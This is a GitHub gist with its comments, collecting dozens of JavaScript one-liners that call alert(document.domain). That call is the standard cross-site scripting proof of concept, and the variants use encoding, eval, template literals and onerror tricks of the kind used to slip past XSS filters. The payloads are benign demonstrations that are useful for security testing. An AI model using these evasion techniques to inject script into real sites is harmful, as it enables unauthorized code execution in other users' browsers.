Last active
November 13, 2024 15:59
-
-
Save tomnomnom/14a918f707ef0685fdebd90545580309 to your computer and use it in GitHub Desktop.
Ways to alert(document.domain)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// How many ways can you alert(document.domain)? | |
// Comment with more ways and I'll add them :) | |
// I already know about the JSFuck way, but it's too long to add (: | |
// Direct invocation | |
alert(document.domain); | |
(alert)(document.domain); | |
al\u0065rt(document.domain); | |
al\u{65}rt(document.domain); | |
window['alert'](document.domain); | |
top['alert'](document.domain); | |
top[8680439..toString(30)](document.domain); | |
top[/alert/.source](document.domain); | |
alert(this['document']['domain']); | |
// Indirect Invocation | |
alert.call(null, document.domain); | |
alert.apply(null, [document.domain]); | |
alert.bind()(document.domain); | |
Reflect.apply(alert, null, [document.domain]); | |
alert.valueOf()(document.domain); | |
with(document) alert(domain); | |
Promise.all([document.domain]).then(alert); | |
document.domain.replace(/.*/, alert); | |
// Array methods | |
[document.domain].find(alert); | |
[document.domain].findIndex(alert); | |
[document.domain].filter(alert); | |
[document.domain].every(alert); | |
[document.domain].forEach(alert); | |
// Alternate array syntax (all array methods apply) | |
Array(document.domain).find(alert); | |
Array.of(document.domain).find(alert); | |
(new Array(document.domain)).find(alert); | |
// Other Datastructure Methods | |
(new Map()).set(1, document.domain).forEach(alert); | |
(new Set([document.domain])).forEach(alert); | |
// Evaluated | |
eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKTs=')); | |
eval(atob(/YWxlcnQoZG9jdW1lbnQuZG9tYWluKTs=/.source)); | |
eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41,59)); | |
setTimeout`alert\u0028document.domain\u0029`; | |
Set.constructor`alert\x28document.domain\x29```; | |
(new Function('alert(document.domain)'))(); | |
(new (Object.getPrototypeOf(async function(){}).constructor)('alert(document.domain)'))(); | |
Function('x','alert(x)')(document.domain); | |
// Template Literal Expression | |
`${alert(document.domain)}`; | |
// onerror assignment | |
onerror=alert;throw document.domain; | |
onerror=eval;throw'=alert\x28document.domain\x29'; | |
// With location.hash = #alert(document.domain) | |
eval(location.hash.substr(1)) |
Thanks for the suggestions, @cmbuckley, @E314c, @avlidienbrunn :)
Try this one:
([,ᅠ,,,,ᅠᅠ]=[]+{},[ᅠᅠᅠ,ᅠ,ᅠᅠᅠᅠ,ᅠᅠ,,ᅠᅠᅠᅠᅠ,ᅠᅠᅠ,ᅠᅠᅠᅠᅠᅠ,,,ᅠᅠᅠᅠ]=[!!ᅠ]+!ᅠ+ᅠ.ᅠ) [ᅠᅠ+=ᅠ+ᅠᅠᅠᅠ+ᅠᅠᅠᅠᅠᅠ+ᅠᅠᅠ+ᅠ+ᅠᅠᅠᅠ+ᅠᅠ+ᅠᅠᅠ+ᅠ+ᅠ][ᅠᅠ] (ᅠᅠᅠᅠᅠ+ᅠᅠᅠ+ᅠᅠ+ᅠ+ᅠᅠᅠ+'(document.domain)')``
((((alert))))(domain)
Yep, you can do just domain instead of document.domain
@mikaelv2 Is there a good place to explain how yours works? I get that it's getting strings of internals like false
, true
undefined
, but I'm lost as to how it accomplishes it and I'd like to know how to make my own arbitrary calls.
alert(eval('\144\157\143\165\155\145\156\164\056\144\157\155\141\151\156'))
[origin].map(alert)
not alert but what about
{prompt`${document.domain}`}
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
[a-z()]
: with(document)alert(domain)